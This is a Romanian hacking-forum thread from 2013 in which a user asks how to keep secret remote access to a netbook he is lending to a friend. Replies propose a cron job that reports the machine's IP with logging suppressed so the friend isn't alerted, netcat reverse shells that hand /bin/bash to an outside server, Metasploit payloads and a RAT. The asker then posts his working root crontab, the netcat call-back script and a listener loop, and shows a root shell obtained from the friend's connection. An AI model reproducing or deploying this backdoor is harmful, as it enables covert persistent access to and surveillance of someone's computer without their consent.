shaggi Posted August 11, 2013 Report Posted August 11, 2013 Deci, am un netbook cu linux. Il voi imprumuta unui prieten pe o anumita perioada, vreau ca atat timp cat el e conectat la wi-fi sau la orice altceva si are o conexiune la internet eu sa am acces ssh.Idei?am si un vps care poate fi folosit daca e nevoie de ceva cu ip static .... Quote
Zatarra Posted August 11, 2013 Report Posted August 11, 2013 Lasi elinks sau lynx instalat, creezi un crontab (scoti logurile deoarece s-ar putea sa-i spuna cand intra in consola faza cu New mail) si rulezi un cronjob la fiecare whatever minutes care iti acceseaza un link al tau cu ip=ul lui. Va fi ceva de genul:a.sh#!/bin/bashfor i in `ifconfig -a |grep inet |awk -F ':' '{print $2}' |awk '{print $1}'`do if [ $i != '' ] then elinks http://yourhost/$i > /dev/null fidoneUlterior poti verifica in access_log cine ce a accesat si vei avea ip-urile disponibile.De retinut urmatoarele chestii:1. Trebuie sa ai sshd-ul configurat in prealabil sa ruleze pe toate runlevelele2. Sa nu ai iptables sau orice alt serviciu care ti-ar putea bloca sshdu3. Sa permita routerul de unde se conecteaza el conexiun incoming pe portul 22 sau pe portul care il setezi tu ca default pentru sshd.Cam atat, mai mutle idei nu-mi vin pe moment. BBL ma uit la film. Bafta Quote
shaggi Posted August 11, 2013 Author Report Posted August 11, 2013 tocmai aia e faza, degeaba face listening, ca routerele au NAT, nu aloca ip public & unic pe fiecare pc conectatacum lucram la ceva gen " nc localhost 13370 <file|bash>file " Quote
Zatarra Posted August 11, 2013 Report Posted August 11, 2013 (edited) tocmai aia e faza, degeaba face listening, ca routerele au NAT, nu aloca ip public & unic pe fiecare pc conectatacum lucram la ceva gen " nc localhost 13370 <file|bash>file "Daca foloseste router, intradevar ip-ul va fi privat dar retine ca atunci cand faci request-ul prin elinks se salveaza ip-ul public (cel care are iesire la internet) 69.69.69.69 - - [11/Aug/2013:21:23:24 +0300] "GET /test HTTP/1.1" 301 332 "-" "ELinks/0.11.1 (textmode; Linux; -)"Got it?Poti incerca si cu NC dar nu recomand Edited August 11, 2013 by Zatarra Quote
BkDService Posted August 11, 2013 Report Posted August 11, 2013 configurezi sshd, il pornesti, il bagi la startup. faci cont pe no-ip.com si creezi un dns, il setezi pe pc-ul respectiv si bagi la startup. problema unde ajunge notebook-ul, ca routeru tipului s-ar putea sa nu fie configurat si sa blocheze portul ssh Quote
MadAgent Posted August 11, 2013 Report Posted August 11, 2013 Sau mai simplu:) daca ai un server, sau un pc pe care ai linux iti faci un dns la no-ip(in cazul in care ai ip dinamic) si faci un connectback de pe laptop catre pc-ul/serverul tau. Il pui sa ruleze la startup in loop, adica daca nu se poate conecta, reincearca dupa un minut, daca s-a putut conecta nu mai incearca pana cand pica conexiunea. Cand deschizi pc-u tau faci un listener si asta e, scapi si de problema router-ului. Quote
Zatarra Posted August 11, 2013 Report Posted August 11, 2013 Sau mai simplu:) daca ai un server, sau un pc pe care ai linux iti faci un dns la no-ip(in cazul in care ai ip dinamic) si faci un connectback de pe laptop catre pc-ul/serverul tau. Il pui sa ruleze la startup in loop, adica daca nu se poate conecta, reincearca dupa un minut, daca s-a putut conecta nu mai incearca pana cand pica conexiunea. Cand deschizi pc-u tau faci un listener si asta e, scapi si de problema router-ului.Nu am inteles nimic de router nu ai cum sa scapi. Daca e blocat inbound in router e ceau Quote
BkDService Posted August 11, 2013 Report Posted August 11, 2013 (edited) Sau mai simplu:) daca ai un server, sau un pc pe care ai linux iti faci un dns la no-ip(in cazul in care ai ip dinamic) si faci un connectback de pe laptop catre pc-ul/serverul tau. Il pui sa ruleze la startup in loop, adica daca nu se poate conecta, reincearca dupa un minut, daca s-a putut conecta nu mai incearca pana cand pica conexiunea. Cand deschizi pc-u tau faci un listener si asta e, scapi si de problema router-ului.genial !@zatarra tipul are dreptate, pc`ul se va conecta pe serverul setat, nu invers. exact cum faci cu un rat pe windows, botii nu au nevoie sa deschida portul pentru ca se conecteaza la server.daca vrea sa faca ssh e problema cu router ca ii blocheaza inbound. chestia cu connectback sau reversec-onnection e singura metoda. ar putea sa genereze si un payload cu metasploit, il baga in startup care il va lasa in pc`ul care il imprumuta, si va fi listener celalalt pc care va fi si "centru de control", parerea mea Edited August 11, 2013 by BkDService Quote
Zatarra Posted August 11, 2013 Report Posted August 11, 2013 genial !@zatarra tipul are dreptate, pc`ul se va conecta pe serverul setat, nu invers. exact cum faci cu un rat pe windows, botii nu au nevoie sa deschida portul pentru ca se conecteaza la server.daca vrea sa faca ssh e problema cu router ca ii blocheaza inbound. chestia cu connectback sau reversec-onnection e singura metoda. ar putea sa genereze si un payload cu metasploit, il baga in startup care il va lasa in pc`ul care il imprumuta, si va fi listener celalalt pc care va fi si "centru de control", parerea meaMai invatati networking Quote
BkDService Posted August 11, 2013 Report Posted August 11, 2013 Mai invatati networking am practicat cat de cat, nu e nevoie. oi fi tu destept dar nu ma bagi in ceata. cel mai bine asteptam sa dea shaggy dreptate Quote
Zatarra Posted August 11, 2013 Report Posted August 11, 2013 am practicat cat de cat, nu e nevoie. oi fi tu destept dar nu ma bagi in ceata. cel mai bine asteptam sa dea shaggy dreptate Server:[root@rstforums test]# ./netcat -v -l -p 6969Connection from 79.118.55.114:42649netstat -tulpan |grep 42649tcp 0 0 192.168.1.100:42649 89.45.193.183:6969 ESTABLISHED 6753/bashClient:[root@OptimusPrime html]# netcat rstforums.com 6969 -e /bin/bashMa bucur ca nu te-am bagat in ceata si ai inteles ca e conexiune TCP care e bidirectionala si ca foloseste port-ul 42649 (este ales random si care poate fi blocat de router default) pe client (laptopul care vrea Shaggi sa-l dea) pentru a se conecta la serverul care asculta.Doar ca sa nu te bag mai rau in ceata mie imi functioneaza deoarece am DMZ pe ip-ul respectiv. Quote
alinh0 Posted August 11, 2013 Report Posted August 11, 2013 am eu un RAT care merge pe linux/solaris/mac. NetWire se numeste..facut in c . Quote
yo20063 Posted August 12, 2013 Report Posted August 12, 2013 Apoi bagi un Lynx, faci o cruce mare sa aiba parolele de la administrare router default, si iti faci forward pentru ssh + bagi un client ddns pentru dynamic ip si gata. Quote
shaggi Posted August 12, 2013 Author Report Posted August 12, 2013 (edited) pe client:shaggi@tractor:~$ cat /opt/asd.sh#!/bin/bashnc *.*.*.* 31337 -e /bin/bash &shaggi@tractor:~$ cat /etc/crontab# /etc/crontab: system-wide crontab# Unlike any other crontab you don't have to run the `crontab'# command to install the new version when you edit this file# and files in /etc/cron.d. These files also have username fields,# that none of the other crontabs do.SHELL=/bin/shPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# m h dom mon dow user command17 * * * * root cd / && run-parts --report /etc/cron.hourly25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )*/5 * * * * root /opt/asd.sh#shaggi@tractor:~$ pe server:shaggi@gmail:~$ cat `which listen`#!/bin/bashwhile(true) do nc -v -k -l -p 31337 -vv; done;shaggi@gmail:~$ listen listening on [any] 31337 ...Multumesc tuturor celor ce m-ati ajutat:)and after a while:shaggi@gmail:~$ listen listening on [any] 31337 ...Warning: forward host lookup failed for cacat.rdsnet.ro: Unknown hostconnect to [ip.server] from cacat.rdsnet.ro [ip.client] 51972iduid=0(root) gid=0(root) groups=0(root) Edited August 12, 2013 by shaggi Quote
MadAgent Posted August 12, 2013 Report Posted August 12, 2013 Ma bucur ca nu te-am bagat in ceata si ai inteles ca e conexiune TCP care e bidirectionala si ca foloseste port-ul 42649 (este ales random si care poate fi blocat de router default) pe client (laptopul care vrea Shaggi sa-l dea) pentru a se conecta la serverul care asculta.Doar ca sa nu te bag mai rau in ceata mie imi functioneaza deoarece am DMZ pe ip-ul respectiv.Dar daca tot faci connect pe serverul tau, de ce nu faci pe 80(ales la nimereala intre 80 si 443 )? Port care dupa parerea mea e deschis pe majoritatea router-elor, cam asa te conectezi pe http Quote
Zatarra Posted August 15, 2013 Report Posted August 15, 2013 Dar daca tot faci connect pe serverul tau, de ce nu faci pe 80(ales la nimereala intre 80 si 443 )? Port care dupa parerea mea e deschis pe majoritatea router-elor, cam asa te conectezi pe http Pe 80 am http si pe 443 am VPN That's why Quote